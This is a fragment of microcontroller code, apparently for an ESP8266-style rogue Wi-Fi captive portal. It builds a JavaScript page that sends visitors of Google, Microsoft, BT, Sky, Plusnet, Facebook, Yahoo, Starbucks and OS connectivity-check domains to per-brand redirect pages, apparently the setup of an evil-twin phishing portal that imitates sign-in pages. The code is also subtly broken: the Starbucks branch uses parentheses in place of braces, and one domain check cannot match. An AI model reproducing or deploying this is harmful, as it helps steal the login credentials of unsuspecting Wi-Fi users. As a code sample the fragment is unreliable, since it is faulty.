//The javascript captive portal that makes it all happen!
String responseHTML = ""
"<!DOCTYPE html>"
"<html>"
"<body>"
"<script>"
"if (document.domain==\""+PORTALLOGIN+"\"||document.domain==\"go.microsoft.com\"||document.domain==\"clients3.google.com\"||document.domain==\"captive.apple.com/\")"
"{"
"window.open(\"http://"+WELCOMEDOMAIN+PORTALLOGIN_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+GOOGLE+"\"||document.domain==\"www."+GOOGLE+"\"||document.domain==\"mobile."+GOOGLE+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+GOOGLE_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+PLUS+"\"||document.domain==\"www."+PLUS+"\"||document.domain==\"mobile."+PLUS+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+PLUSNET_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+BT+"\"||document.domain==\"www."+BT+"\"||document.domain==\"mobile."+BT+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+BT_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+MICROSOFT+"\"||document.domain==\"www."+MICROSOFT+"\"||document.domain==\"mobile."+MICROSOFT+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+MICROSOFT_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+SKY+"\"||document.domain==\"www."+SKY+"\"||document.domain==\"mobile."+SKY+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+SKY_redirect+"\",\"_self\");"
"}"

"else if (document.domain==\""+FACEBOOK+"\"||document.domain==\"www."+FACEBOOK+"\"||document.domain==\"mobile."+FACEBOOK+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+FACEBOOK_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+YAHOO+"\"||document.domain==\"www."+YAHOO+"\"||document.domain==\"mobile."+YAHOO+"\")"
"{"
"window.open(\"http://\"+document.domain+\""+YAHOO_redirect+"\",\"_self\");"
"}"
"else if (document.domain==\""+STARBUCKS+"\"||document.domain==\"www."+STARBUCKS+"\"||document.domain==\"mobile."+STARBUCKS+"\")"
"("
"window.open(\"http://\"+document.domain+\""+STARBUCKS_redirect+"\",\"_self\");"
")"




"else"
"{"
"window.open(\"http://\"+document.domain+\""+SITEOTHER_redirect+"\",\"_self\");"
"}"
"</script>"
"<h1>Redirecting...</h1>"
"</body>"
"</html>";
